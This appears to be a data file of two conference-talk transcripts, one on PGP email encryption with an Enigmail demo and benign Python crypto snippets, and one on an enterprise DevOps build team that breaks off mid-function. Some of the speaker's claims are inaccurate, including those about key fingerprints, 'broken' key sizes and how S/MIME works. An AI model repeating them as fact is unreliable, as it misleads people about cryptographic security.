it. So therefore, maybe we should change the bank. But it's not so easy to find banks which do it all right. We need pressure for that. Okay, so far for browsing. Now let's look at emails. With emails, we have a similar problem, which is: in principle we can encrypt data, but we can't easily encrypt metadata, which is who I am sending data or emails to. If you need that, then it's even more complicated. In practice there's no working and established protocol where we can just use a private communication where nobody can track that we communicated. So if that's your problem, I don't have a standard answer for that. But if not, if it's only that, yes, they can know that I have a discussion with my tax lawyer, or that I am exchanging emails with my doctor for medical reasons, yeah, they can know that, but they shouldn't know that I talk about abortion here without me allowing that. So that's something we can solve. And to solve that, there's a very famous approach, which is PGP; there are other approaches.
And before I go into details and list some of the issues involved there, please allow me to explain PGP, and in principle asymmetric encryption, by an example, because that's usually the easiest way; even my mother understands these slides. Well, she at least claims to. Okay, so what is the trick? That's Nico on the right, and I want to make email exchange secure. The first thing I have to learn is that it's something we have to do on both sides. So one thing I can arrange is that people can send me emails without anybody else reading these emails. But I can't do anything with this protocol to send encrypted emails to other people; they have to prepare for that. So I have to prepare keys, and these keys are asymmetric keys, and there are two keys; in fact, in practice there are even more. Let's, for simplicity, assume there are only two keys. And these two keys are used as follows: one is to encrypt data and one is to decrypt data, and you can only decrypt data that was encrypted with the other key, and the other way around. So the point is, now I have created these two keys, and the fundamental first rule is: nobody gets my decryption key, which is also called my private key. With this I can read the data. With the other key I can only encrypt the data, which means with this key I can arrange that only Nico can read this data, because only the owner of the private key can decrypt this data. And there's nothing wrong with giving this key to other people, or to the public, or putting it on a website or whatsoever, because nobody can violate privacy with this key. They can only encrypt data which nobody can read except me. But to make sure that only I can read it, I need the private key at home, or on my laptop, or wherever; we come to that. Okay, so that's something I have to prepare. With this preparation I am able to receive encrypted emails. So now somebody wants to send me an email. Okay, here's a yellow guy, an orange guy. The orange guy wants to send me "Hello Nico" as a test message. Okay, so what do they have to do? They encrypt the data with the mailer. To encrypt this data they use the public key. Somehow this guy got this key: I might have given it to him on a USB stick, I might have put it on my website, I might have put it on a central server where public keys are available, I might have written it in a letter with 4,096 bits and they have to copy them. That's all possible. It's still possible to copy 4,096 bits; it's a little bit boring, but it is. So this is the result, and you see there, well, as a little bit smaller icon, there's "Hello Nico" encrypted by this key. And then you send the encrypted message to me. And so what I do then: I use the private key to decrypt the data, and suddenly I see "Hello Nico" again. So that's the deal. If I want to send an answer to this guy, he first has to do the same, to create a private and public key pair. Somehow I have to know about his public key, and then I can encrypt the answer with his public key, send back the encrypted data, the email, and then he can decrypt the data. The good thing with this is: we don't have to exchange any passwords that other people could catch, because I don't send anything secret over any public communication channel. The drawback, of course, is that we both have to be prepared to exchange data this way. On the other hand, I can even receive encrypted emails from people who are not themselves prepared to receive encrypted emails, by using this technology, just because I prepared everything on my side.
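The same key-pair dance, written down as a runnable sketch with the Python cryptography package. The "Hello Nico" message is just the example from the slides; raw RSA with OAEP padding stands in here for what PGP does with a more elaborate format.

```python
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Nico's preparation: create the key pair, keep the private key, publish the public one.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=4096)
public_pem = private_key.public_key().public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo,
)

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# The sender only ever sees the published public key ...
senders_copy = serialization.load_pem_public_key(public_pem)
ciphertext = senders_copy.encrypt(b"Hello Nico", oaep)

# ... and only the holder of the private key can turn the ciphertext back into text.
assert private_key.decrypt(ciphertext, oaep) == b"Hello Nico"
```

Publishing public_pem anywhere is harmless; losing control of private_key is the only thing that breaks the scheme.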
So that's the principle. First of all, one important thing here is that people cannot, just by using a huge amount of computing power, simply try out all the possible keys. There are two to the power of the size of my key combinations to decrypt the data, and two to the power of 4096 is a very huge number. So we are pretty sure that it will be stable for the next 20 years or more. We thought in the past that 256 bytes for a key would be fine, but we now know that this is broken. But the recommendation for people who say you want to be safe in your infrastructure for the next couple of years, so not just two or three but ten, is: 4096 bits is fine. So that's the first thing. The other thing is, there are still some problems. One thing is that we use random number generators, and one common trick by secret services is to compromise random number generators, so that you only create, say, a thousand random numbers instead of the whole variety of two to the power of 32 or 64. So then you screw up not the algorithm, but the way the algorithm is used combined with random numbers, and that might also lead to some problems. So it's not only that, but this is the most important step; this is the basis to be safe. Okay. But the other thing that might happen is the following. It's a so-called man-in-the-middle attack, where we have the following: suppose the orange guy wants to send me an email and he doesn't know my public key. So he needs it from somewhere. I can give it to him personally. The other option is he looks at my website, or he looks at a public server, but there's a fake key there, faked by whoever, who knows. So in the communication, by retrieving the public key, somebody gives him a different key. And with this different key he encrypts the data, but it's the wrong key. So somebody in the middle, who has the private key matching that fake key, can then read the data, and then use my real public key to send the data on in a way that I can read it, so that I have the impression I got this message from the original sender; it doesn't get lost, I can still read it, but there was a change of encryption in the middle. So these are man-in-the-middle attacks, and to prevent them we can do a couple of things. The safest approach is: I hand over my public key to each person personally. I go to you and I give it to you, and you know that's Nico, and we are fine. The other thing is: each key, even if it has 4,096 bits, has a so-called fingerprint, which is just a hash value, a unique value of the last, I don't know, 32 bytes or so. So I send this key around, and then we communicate by phone, we know our voices, so that my voice is not somehow faked, and then we agree that the fingerprint is right, that the last bits match, and then we know it's fine. And then we can use other approaches. One approach is: I trust places where I can officially publish keys. This is, by the way, the S/MIME approach, which is another encryption technology, better supported by most of the mailers. The problem is that these servers, the S/MIME servers, are controlled by, well, are located in the United States. So, hmm, well, just theoretically, just in case the NSA wants to get access to these servers, they can, and with the Patriot Act of the States it's not even allowed for those who are running these servers to tell me that there might be some secret service looking at these keys and faking keys.
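As an aside, here is what that phone-call fingerprint comparison can look like in code. This is my own sketch of the idea; real OpenPGP fingerprints are computed over the key packet by GnuPG itself, not with this ad-hoc SHA-256 scheme.

```python
import hashlib

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

def fingerprint(public_key) -> str:
    # Hash the serialized public key and show a short, phone-friendly excerpt.
    der = public_key.public_bytes(
        encoding=serialization.Encoding.DER,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    digest = hashlib.sha256(der).hexdigest().upper()
    return " ".join(digest[i:i + 4] for i in range(0, 40, 4))

key = rsa.generate_private_key(public_exponent=65537, key_size=4096)
print(fingerprint(key.public_key()))
# Both sides compute this locally from the key they received and read it aloud
# over the phone; if the two values differ, somebody swapped the key in transit.
```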
So, about S/MIME: we have some examples, and we are pretty sure in the community that the S/MIME approach is broken for privacy. You can still use it if you compare the keys yourself; that's fine, and the whole technique is there. But if you just want to use keys from public servers, then S/MIME is a risk, a known risk now. So the other approach is the PGP approach, and the PGP guys thought differently about that. They said it's always a risk if I create some protocol where there is central control, because then there's a central ability to corrupt this control. And the idea here is in principle that they built a so-called web of trust. That means there's no central server. Well, there are central servers, but these central servers only hold the keys, and there's a protocol inside the keys that is used in a way that people have to confirm that a key is valid. So I can download the key from the server, and inside the key there might be a statement that my girlfriend signed this key, or that a company I trust signed this key. Of course, it's again difficult if I trust the wrong people, but the principle is: either I signed the key, or somebody I trust signed the key, or enough people I trust signed the key. And if you sign a key with this protocol, you can say: I am absolutely sure that this is the key for this person, using your personal ID, or because you know that person and you agree this is my key. Or you can say: well, yeah, I think it is this person, but I'm not absolutely sure. And then there are some rules inside which say, for example: if either I trust it, or if there are three other people that confirm that they are sure this is the right person and this is the right key for this person, then we accept this key as valid. So this is the general idea. The general idea is that we build a web of trust, where, if I can't find out myself whether I can trust this key, I can find it out indirectly with the help of other people I trust. You can configure how many indirections are allowed, you can configure how many proofs by trusted people you need, but the defaults are usually fine. It depends on how likely it is that other people screw up the trust of keys, et cetera. So that's built into PGP, and that gives PGP a lot more power, because it can't be screwed up in a central server by just one person or one company. So, having said that, let me say something about keys. Well, first of all, a key can represent more than one email address. Also, a key has an associated revocation certificate; with your key you get a way to revoke this key, and you should always create this when you create a key. So keys can have the following states: valid, invalid, expired, revoked, disabled. Another thing a key has is an expiry date, and you can also personally disable a key in your own environment. A key also has a passphrase, and you can change this passphrase, you can change expiry dates, and add an additional email address. So the usual thing you should do, if you create a key: create it please with 4096 bits and the RSA algorithm. Please create a passphrase, please set an expiry date, something like three or five years. So that if you just forget the whole issue, because privacy is no longer an issue, it's just a hype now, and in two or five years we have all forgotten it until we have the next problem, then this key is not valid for centuries.
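A sketch of that key hygiene with plain RSA in Python: 4096 bits, and a private key that is never stored unprotected. Expiry dates, revocation certificates and the web of trust are OpenPGP features, so for a real mail setup you would generate the key with GnuPG or Enigmail rather than like this; the snippet only illustrates the two rules it comments on.

```python
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

# 4096 bits, as recommended in the talk.
key = rsa.generate_private_key(public_exponent=65537, key_size=4096)

# Rule 1: the private key never leaves your control, and it is encrypted at rest
# with a passphrase, so a stolen file alone is not enough to read your mail.
private_pem = key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.BestAvailableEncryption(b"a long passphrase"),
)

# Rule 2: the public key can be published anywhere without any security penalty.
public_pem = key.public_key().public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo,
)

with open("me.private.pem", "wb") as f:
    f.write(private_pem)
with open("me.public.pem", "wb") as f:
    f.write(public_pem)
```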
So and you should please be aware that you can, although a key can be used by multiple email addresses, the life cycle of these email addresses should be the same. So it's not a good idea to have one key for your job email address and your private email address because when you change jobs this key might be invalid but you still need it for private reasons. So therefore please make sure that you have different keys for different life cycles. You can still change the email address in your private life or in your business life but you should separate these keys for these areas. And as I said before, never give up control of the private key. It's no problem to give up control of the public keys and you can also give up control of the revocation keys. There's no secure penalty there because the worst thing that can happen that somebody revokes the key but still with the private key you can read the email so it's just an inconvenience. So the only thing you really have to care about is the private key. That's the important thing. Don't give it to anybody or anywhere. Well, that's what we come to that. Some other commands. PGP has two flavors, inline PGP. That's an ad hoc PGP standard or it's a non-standard. It's just, it works. And we have a PGP MIME standard for emails and the problem with the MIME standard is not supported as well as inline PGP as inline PGP is ad hoc. You might have especially problems if you have attachments and emails, et cetera. Then, unfortunately, we still have interoperability issues. This technique is 25 years old. But still we have limited support for PGP MIME and inline PGP serves pretty well but has some limits. So we have very well support with Thunderbird called an Enigmail add-on. I'm currently a contributor to this add-on to make it more convenient. We come to that. And Apple has, for Apple there's GPG tools. Both is not supported by the vendors. It's third party projects for add-ons by private companies or private people. So private just interest people. We have restricted support for outlook, platforms and web mailers like Yahoo, et cetera. There is some solution. Here are some hints about where you can look at. The real problem is vendors don't care about PGP. I don't know a buy. Maybe it's not worth it. It's not worth the effort. Maybe there is some secret governance by, for American companies because all these companies are American not to support this standard. We don't know. We simply don't know. So and then the quality of the support can be very different. Ideally in this world it should be the following as we will probably, as PGP is not common or mature, you will exchange data with people who don't have PGP support. But you might want to exchange data who have PGP support. The obvious, easiest solution is the following. If I have a key for all my recipients automatically encrypted and send it encrypted. So that's the best support where you don't have to do anything with when sending emails. This is not implemented in all the browsers. So sometimes you have to explicitly enable encryption. You can then somebody sometimes add rules when for this guy it should be encrypted for this guy not etc. So there's different convenience and different inconvenience there. In the worst case if there's almost none support, you have to copy and paste the content of your email to an encryption program and copy it based after encryption back or to read it you decrypted this with another tool and then you copy paste it better or after that you can read it. 
That's always possible, but that's very inconvenient of course. Please help. So last minutes I want to show you some examples. I have 50 more minutes. I am contributor of Enigmail. So I want to show you some examples how this works. So I hope I don't give you too much privacy of my email communications. This is not a special account, but I disabled hopefully enough. So this is Thunderbird and here you see, well, I'm switching to an email and in this email. Yeah, as I haven't, haven't put in my passphrase and it's the first time I read this email today or how long this passphrase is valid. I have to put my passphrase. Oh. So now there it is. So the formally unreadable content now becomes readable. You see here there's a green sign saying that this is a decrypted message and that this is a signed message so that the sender also authorized him. I didn't have a demo for that how it works, but besides sending the email encrypted, if I want to make sure that it comes from the right person, I can also sign it with my keys. So, and I can read it and handle it. I can reply to it, et cetera. To do that, I, well, I have to install the tool, the add-on. I have then to start a wizard which also asked me to create a key pair if I don't have it and I have to provide some preferences. Here you can see the major preferences we have. Well, we have two major preference tabs. The first one is they tell me where they found the underlying encryption software which is a program called GPG PGP. And so I can use that. I can install it separately or you can install it with the Enigmail add-on. And then here you see that I say my passphrase is idle for 40 minutes. So after 30 minutes, I'm asked again for passwords when I want to read the emails again. And then I have some sending options. This is, by the way, not the current version you can download as the official add-on. This is a nightly build. It will become in four or six weeks the official version. So one thing I added was this automatic encryption. Automatic encryption if I send emails which is not there before. So I tried to add some more convenience here. So we will see in a moment. So here is when sending emails, use convenient encryption settings. And as you can see here, the convenient encryption settings automatically reply encrypted if you got a reply to an encrypted message. They automatically sign. If you want to reply to a signed message, they accept all keys. So we don't use the trust model I just introduced yet. We say, oh, it's good enough. It's still better than sending postcards. So, but of course if you, if this man in the middle danger is a real danger for you, you should not select this option and then automatically send encrypted if possible and don't confirm before sending. Well, I will confirm. So I use my manual settings. There are a couple of more options as you can see if I add on the export settings, but these are the main settings. Okay. So now let's answer this email. So I have two screens here. I have to, so this opens my reply message. So here on the bottom right, there you see two symbols. These two symbols say the message will not be signed and the message will not be encrypted. So, hmm, but I have auto encryption. So let's select somebody I have a key from. So which is my, my colleague, Utah Eckstein. 
So you see even now, why this new, this person is selected in this menu on the bottom right, you see a plus sign there in the key which might, which means in principle, my general preference was not to encrypt, but with the plus sign, it will be encrypted. So, so let's do that. I can also go here and enforce encryption or force signing and I have, for example, the ability to change some defaults. For example, here are my defaults for this account in Thunderbirds. So in general, sign all messages or encrypt all messages, finally sign automatic messages when they are encrypted or when they are not encrypted, etc. So here I could now send, for example, by explicitly clicking no, I don't, yes, I also want to sign it, but no, in this case, although I have the key, I don't want to encrypt it. So just hitting this button does that. I do it back here. So, so I have now here forced sign and encryption just because I have the key. Yeah, so that's it. Hello. She's currently in Budapest, I think. So hello to Budapest at another conference. So that's it. Oh, this, this is privacy video taped. Too bad. Okay. We signed it about the date when I sent this. Okay. So, I send it while here's later, send on later. So I'm now request for sending the email for my passphrase. And that's it. Here you see a final confirmation, which is us and here you see the encrypted message which will go out over the internet. And, yeah, nobody can read this message unless they have this private key. So, yeah, because I'm not online right now, they are sent later and though I have the option to save this message now and there's also a final information which keys are used. Yes, the subject is not encrypted. The subject is, it's, it's only the content of the email. So what we still know is who is the sender, who is the receiver, what was the subject. Yeah. So the meter, meter data of email is still known. That's what I said. So what else I want to say or show you? Yes. In this case you said, Nico, because now you didn't have the key for encryption to watch Nico. Is that correct? No. Or just, you know, you have two receivers. Ah, yeah. Oh, yeah. I have only one receiver here which counts. I have another receiver which is BCC. BCC has the idea of that other recipients don't see that there's another guy reading on getting this email. Now, if I would encrypt for this guy, the information that this was encrypted for this guy will be part of the message. So therefore, BCC is a special case. BCC doesn't count and there will be warnings if I BCC not to myself. It's just, it doesn't count here because I send it to myself. But if I send BCC to others, there will be a warning. Do you know that this means that people can see that or that you can violate BCC? Because what happens here, what you see here is the following. This is encrypted. Part of this encryption is the information which key was used by whom. You can disable that but, yeah, usually don't do that. So the better, the better approach is don't use BCC. Just BCC as a separate mail to others. And as I said, a mailer should warn about this danger. And by the way, and you can send to multiple people just because this question also arrives again and again. So does it mean that, that with every additional receiver, the message size grows by the same amount? No, it doesn't. Because the trick is internally the email uses an temporary password, a temporary key. And only to read this key, that's encrypted for all the receivers. 
And so, for each receiver, there is a special encrypted copy of the key needed to read the data. Therefore the whole message doesn't grow much for every new recipient. So when I have multiple recipients, as I said, the message itself is encrypted just once with a temporary key, and for each recipient there is this temporary key encrypted for that recipient. So it will grow a little bit, but just some bytes. So we can see that, we can see it here. If I break it up, and to show you some other examples: I have some test accounts here, so let's send it to somebody where I have a rule that says, when I send to this guy, I want to have it encrypted. And then I send it to another guy, and there I have the rule: never encrypt to this one. And you see here, for example, that internally I have a violation of the rules that are there. Usually you don't need rules if there is this auto-encryption mode. But as I said, this auto-encryption mode is new and will be new in Enigmail 1.7. It's only in the nightly builds; in four weeks it will be there. Before, you needed rules, and with rules it was more likely that you get some conflict, et cetera. So then I can resolve this conflict by hitting here and saying: well, I don't want to encrypt, or yes, I want to encrypt in this case. And if I don't have the receiver, so let's take a new receiver, take a Jim Hook, I don't know why this name comes to my mind, I don't know anybody of that name, from the email dot de. And I want to send this to this guy. This guy is not known. So I get an interactive dialogue, and in this interactive dialogue they try to find this receiver, because it might be that this is a different name of somebody I know. Let's not show you too much of all my keys. So if I send this email to somebody where I have another key, I can select it easily here. But if I don't know this guy, I go here: download missing keys. Oh, yeah, I'm offline right now. And then I get a dialogue to look at the public servers: do they have this key? And then I can use it, and then it's part of my key list, my key management. And the next time it will be automatically encrypted when I send to them. So it's pretty convenient to add new recipients. And, yeah, it's not all, but this is the major interface we use right now, or will use with the next version or with the current nightly build. So let's see. Three more minutes. Any more questions here? Yeah. Do you know how many, I mean, because most people these days use, well, I do email on the web. Oh, yeah, yeah. How about email on the web and smartphones and web mailers, et cetera? Yes. That's the question. So let's get back to my slides. Ah, here's also one recommendation which I didn't mention yet, which is that when signing emails, it might be that you use SHA-1 by default, which is a broken hashing algorithm. So you would have to change some settings, for example on Windows and maybe on other systems, to use a better algorithm for signing. Unfortunately the defaults are not that good; I have to double-check that with these guys. So this is also one thing. So let's look at the other examples. Where is it? The best support we have, as I said, is for Thunderbird and Apple Mail; with Outlook and smartphones it gets more complicated. For Android, see OpenKeychain; there is some GPG tools support for the iPhone. And for web mailers, look at the website Mailvelope.
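Going back to the multiple-recipients point for a moment: that "temporary key" trick is ordinary hybrid encryption, and it is easy to see in a sketch. This is again my own Python illustration with small demo keys, not the actual OpenPGP packet format.

```python
import os

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Two recipients with their own key pairs (2048 bits only to keep the demo fast).
recipients = {name: rsa.generate_private_key(public_exponent=65537, key_size=2048)
              for name in ("jutta", "nico")}

# The body is encrypted exactly once, with a random temporary session key ...
session_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
body = AESGCM(session_key).encrypt(nonce, b"Hello from the demo", None)

# ... and only that small session key is wrapped once per recipient.
wrapped = {name: key.public_key().encrypt(session_key, oaep)
           for name, key in recipients.items()}

# Each recipient unwraps their copy of the session key and reads the same body.
key_for_nico = recipients["nico"].decrypt(wrapped["nico"], oaep)
assert AESGCM(key_for_nico).decrypt(nonce, body, None) == b"Hello from the demo"
```

Adding a recipient adds one wrapped key of a few hundred bytes while the encrypted body stays the same size, which is the behaviour described above. It also shows why BCC is tricky: the list of wrapped keys itself reveals who can read the mail unless you deliberately leave someone out.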
You will find Mailvelope if you search for it. That's an interface that wraps Google and Yahoo, et cetera, so that you can use it. They are all not that convenient yet. So, unless you fix that in the next days, I hope so. So let me summarize. PGP can be used, but it can be inconvenient. The best support we currently have is with Apple Mail and Thunderbird; that will change. I know, for example, the developer of OpenKeychain, the Android add-on for PGP, and he, for example, got three guys sponsored by Google for three months to fix some of the stuff. So there is some support, also by American companies, to improve the situation. Let me also say that, in general, the number of people behind some of these inventions is incredibly small. There's only one guy maintaining the underlying general tool, GnuPG, which almost all of us use. And Enigmail, where I contribute: I thought, oh, there will be 10 or 100 people. No, I became the second contributor of this beast. So, yeah, it's incredible how little support we have there. And if you are really keen on helping, come to me or go to the websites and offer your help. We need it. We need it desperately. Okay. Then some open issues. As I said, the further goal is to support PGP/MIME on all platforms, so that we have a standardized, formal email protocol also on smartphones, et cetera. However, there will be one problem. To read the email, you need the private keys on all devices. Well, a smartphone is very smart these days, but that means something for the private key: if you lose your smartphone, that might be an issue. And as I said, you can revoke keys so that people no longer send you emails with that key, but for the old emails, if somebody has that key, they can read them. So you have to be careful. Well, they can only read them if they also have the passphrase. So there's also a password; that's one reason why you have to use a passphrase together with the key. If somebody gets the key, they still have a problem reading it. So there are still some issues to solve. And then one issue I should also mention: if you receive encrypted emails, the question is, when you decrypt one and you then save the email or leave your mailer, is it saved decrypted, or is the formerly encrypted email saved on your disk? That has an impact, because, for example, if you always store your emails encrypted after receiving them, you have a problem searching in email contents, which is one of the most frequent pieces of feedback I got from people who wanted to switch: I can no longer search in emails. Yes, you can, but it's also a lack in the mailers, that they should support an option to say: well, let's store the decrypted version in our folder, because the major problem we want to solve now is the communication, people who violate privacy at routers, et cetera, so on the communication channels. But of course, there are also applications where you want to say: when I save the email, it should still be encrypted. For example, if you have to hide something from your family, or from others who can have access to your email account. Decide yourself whether it's worth it. I hope this gave you some insight. I hope you also saw that, at least with some mailers, it's not that difficult, as you saw. My major goal is to make it so convenient that all people use it, because then it's no less convenient than without encryption.
So that, that would be the goal, but it's a long path to there. So please help us and thank you very much.
|
Are you as fed up as I am with all the privacy scandals caused both by secret services such as the NSA and GCHQ and by companies such as Google, TV companies, and others? But what can we do? Well, Martin Fowler recently gave an important keynote with the working title "We are not just code monkeys." It talks about the role we as IT guys play, could play, and should play in this world. So let's use our knowledge and responsibility. The goal for this session is to get a better understanding of the problem, the tasks, and possible solutions, so that we IT experts can finally rescue the world. It's not a talk, it's a starting point.
|
10.5446/50853 (DOI)
|
Can you hear me okay? Okay, so, this is about development operation, and in DevOps, we deal with stuff like this, and have to be agile and think on our feet in order to react quickly on stuff like this. But I think this will work with Plan B. Thank you for staying this late in the conference. This is actually the last talk of the day. This presentation is, I labeled it, a peek into an enterprise development operation team. So many are familiar with the term DevOps. My name is Nils, and I'm the manager for the Build Services Group in Petrel, which is a DevOps team. Let's see if this works. All right, so, just a little bit more context. Petrel is a product that we build in the DevOps group. It's a platform in the oil and gas industry. It enables experts to work together and make the best possible decisions all the way from exploration to production. So what that means is that the software models the earth so that the geologists can get computerized models out of the earth. It also goes through reservoir characterization and modeling and also through production. So production engineers can find out where to optimally produce oil and gas or carbon. We also have an SDK on top of the platform. It's based on the ocean technology, and you can learn more about that at the stand down in the galley here. That's a little bit about the context. So it's Petrel and its ocean. This slide here is, and this whole slide sets, I'm gonna try to lead you through a journey that we've gone through with the development operation team. And basically the result of that journey is that we've been able to increase our customer responsiveness with improved quality while we've been growing this platform footprint. So the graph on the left hand side displays the trend as far as having a daily installer available. You see that the success rate of the installer has gone up but also the variations of how often we can get a successful installer has also gone down. You can see in there on the left hand side. From a client perspective, we've been able to give out fixes more quickly as a result of this. The chart on the right hand side is more of an internal view. This displays how we've increased the number of automated tests while we've also increased the average success rate of the builds themselves. And at the same time, we've also increased the success rate of the developer and at the same time, we've also reduced the build time. So these are sort of internal KPIs. So I'm just gonna take a quick break here. In the audience, who's in the DevOps team? Okay, so a few. In the audience, who's in a development organization with more than 50 developers? More than 100 developers. More than 200 developers. Okay, so then you're gonna understand some of the things that I'm gonna be going through. My group, like I said, is a Petroleum Build Services group. Our bread and butter is Development Environment and Hosting. It's about configuration management. It's basically source control. It's running the continuous integration tools. And it's also licensed administration of this development environment. So specific things. We set up team branches. We set up release branches. We do auto integrations between these branches. We offer personal builds. We also have team builds or specific feature builds and integration builds, as well as the setting up the daily installer. So as part of the installer work, we create the installer by using templates. 
Because we also have an SDK on our product, we reuse these templates for internal and external use. We also put in health checks to make sure that it's installed on the hardware that we recommend and within the bounds that we recommend. And we also offer extensions installers. We also do a lot of release coordination. In short, we can separate our development cycle into pre-alpha period, alpha period, beta period, and to get to the commercial. And so there's a lot of scheduling involved, alignment of the builds to get them to integrate at the predefined milestones. We also whitelist external software that we use internally in the product. And because we do all these builds, we also provide KPI metrics to the organization and also documentation overall to the development organization. The last piece is sort of a thread that goes through the presentation. It's a big focus on continuous improvement. Both on the build side and the IT environment side. So specifically, it's about automates, where it's feasible and where it makes sense. Training and documentation of the developers. And alignment with corporate IT. So maybe some of you have experience with data centers. We sort of have our own internal data center. And in many scenarios, it would be as if we were dealing with an external data center supplier. Because we have all this data of builds coming in at fairly fast rates and with a big breadth, lots of data coming in. We also do a little bit of big data analytics. So we take a look at this to see how can we better create these workflows for personal builds for quality gates and stuff like that. Assuming certain things about the organization. So there are certain ways you can do that. You can have questionnaires, you can have surveys, you can have gut feelings and stuff like that. But we also have data that we collect and we also look for pattern analysis in our database. All right, so the challenge that we were facing before the transformation was basically split in three. Organization, process and technology. From an organization perspective, we're a geographically distributed team. As you can see in the map there, you have quite a few time zones. Which is a challenge in itself when it comes to collaboration but also cultures and schedules and so on and so forth. Another challenge was the definition of a quality gate. What does green mean to you? It's not necessarily the same definition as what a green build means to somebody else or a test even. You can do this at all different kinds of granularity levels. Units, module, integration, all the way up to the product. Schedule alignment. Our platform also plugs in with other products. Which may have a different schedule than the schedule that we have for the platform. So there is product coexistence in the system as well. Although the organization as a whole is actually quite good as far as software development practices and TDD and agile practices, there's also spread within the team because we're so big on the maturity level of practicing these techniques. This software itself is also tightly integrated. So you can basically carry a workflow through many of the vertical domains. So it's a very integrated product. And because of that we have dependencies both on the business side and on the technical side. 
And because the software has sort of gone through acquiring smaller companies and acquiring deep science from other places, we've also sort of acquired a tool stack that's also been a challenge in itself because it's good systems by themselves, but don't necessarily work that well together. Alright, so in this environment the challenge was to get predictability, traceability, repeatability, and quality out of the system. So before I go into how we actually attacked this challenge, I need to go through a couple of or a few preconditions and guiding principles. Number one, our software or our platform is, the software architecture is layered, it is modular, and it's extensible. The software process I would say overall we're practicing continuous integration and there is buy-in in test automation and there's a general consensus in the organization that test automation is a good investment. So with these building blocks within Agile software practices, I also want to highlight the fact that to do change management within the organization is also something that actually developers are quite used to. And because we do it quite often, it's also sort of a motivational factor because people they like to develop on the latest and greatest of technology. So basically you have the motivation aspect as well. And from management we have buy-in and support because of the communication channels that we have. So from an organizational perspective we basically have top-down support and we're able to implement from the bottom up because of the motivation generally in the organization. So these are sort of the preconditions. For the development operations team we have some guiding principles. It's automation. It's being able to design the system for self-serviceability, meaning we're not putting ourselves in the critical path of tons of developers. They can basically serve themselves. Within the group we have a strong level of knowledge redundancy within the group. And there's also a focus on service continuity. Because we're physically located in Norway, you can't really detect that from the other centers because we're on holiday for instance. We have service continuity plans in place for that. And last but not least there's a big focus on continuous monitoring of the whole system which feeds into the continuous improvement cycle. Alright so that was the context, the product, the situation, the challenge. Then now the presentation goes into what is it that we wanted. So just a brief explanation of our build system. So we have a bunch of libraries. First and second and third party libraries. We have our platform that we build and then we have because of our extensibility framework we have a bunch of internal plugins that we bundle with the platform when we ship the DVD. All these developers are also outlined the phases, the pre-alpha, alpha and beta. And the whole point of starting early with all these developers is to get early feedback in the build process. And then when we get to commercial we have sort of an equivalent to iTunes. We have an ocean store where you can publish your plugins and basically be an independent software vendor on top of our platform. So there's a bunch of build ripples. In between these build ripples we've invested quite a lot on quality gates. And I'll get back to that in a minute. So basically what we wanted out of this continuous delivery build system was we wanted to facilitate a Ferrari. We wanted to facilitate speed. We wanted to go through this very quickly if we had to. 
We wanted to protect ourselves against the ignorance of the quality gates. So we had to have trust in the quality gates and they had to be predictable by everybody. But we also wanted to avoid congestion in these quality gates. We had to be performant. They had to be easy to understand. We couldn't create anything that required the DevOps team to go in and explain the logs and so and so forth. Because then you're creating waste in the system by people waiting on each other. And it doesn't scale very well. So I separated into technology process and organization from the technology. Quite simple. We wanted fast builds. And because of that we needed dependency awareness. We wanted the gates to be smart. So we wanted smart gated check-ins. And we wanted the tools to be uniformly distributed against all the machines that we have in the third park. As well as the desktops where developers are working locally. Across all the centers that are contributing to the platform. From a process perspective as I mentioned in the previous slides. We wanted early feedback. And we wanted the release days to not be stressful. Raise of hands. Who thinks it's stressful? It becomes a little bit stressful in the organization when you're one week away from release time. A few. So that's what we wanted to avoid. We didn't want this stressful release days. We wanted to practice this process throughout the development cycle. Where we designed, developed, test, release, adopt. And all this through this stability promise. Throughout the pre-alpha, the alpha, beta to the commercial release. From a process perspective we also wanted traceability and continuous monitoring. Because we wanted to be able to adapt if we had to. So we still wanted this element of continuous improvement in the process. So from an organizational perspective, what that really translates into is we wanted people to have clear roles. Clear responsibilities. There's no question about if the build breaks, who does what. What does this mean. So on and so forth. And from a development operations perspective we wanted this self-service mentality. So whatever we did next time, we didn't have to go into this servers to produce some of these logs. To give to the developers. Because they would be already attached with the build log. That's just one example. Because we wanted within the DevOps team, we wanted sustainable working hours. Like I said in the map earlier in the slide set. We produce time, or we support time zones all the way from Houston to Beijing. So that's pretty much 24-7. And also because of that and because of the continuity objective, we had to have knowledge sharing within the group. So we had to come up with some sort of a system where we could knowledge share without having to shadow each other at all times. Alright, so that was the challenge. That was the wish list. So then the question was, and I mean you've probably been inspired by many other things from the other talks here. You think, yeah I want to do this. But we're a big organization. How do you do this? How do you do this with hundreds of people? So I'm not going to say that this is the way to do it. But this is what we did. We realized that the road to continuous delivery would be a long walk. It would be driven by constraints, by business. We had to have annual releases. This is sort of like fixing an airplane while you're flying it. So we had constraints. 
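To illustrate the "dependency awareness" item on that wish list, here is a toy sketch of how a build system can decide what actually needs rebuilding after a change. The module names and the graph are invented for the example and have nothing to do with Petrel's real structure.

```python
from graphlib import TopologicalSorter  # Python 3.9+

# module -> modules it depends on (a made-up graph, purely for illustration)
DEPS = {
    "core": [],
    "seismic": ["core"],
    "modeling": ["core"],
    "simulation": ["modeling"],
    "platform": ["seismic", "modeling", "simulation"],
}

def rebuild_plan(changed: set[str]) -> list[str]:
    # A module is dirty if it changed or depends, transitively, on a change.
    dirty, grew = set(changed), True
    while grew:
        grew = False
        for module, deps in DEPS.items():
            if module not in dirty and dirty.intersection(deps):
                dirty.add(module)
                grew = True
    # Keep a safe build order: dependencies always come before their dependents.
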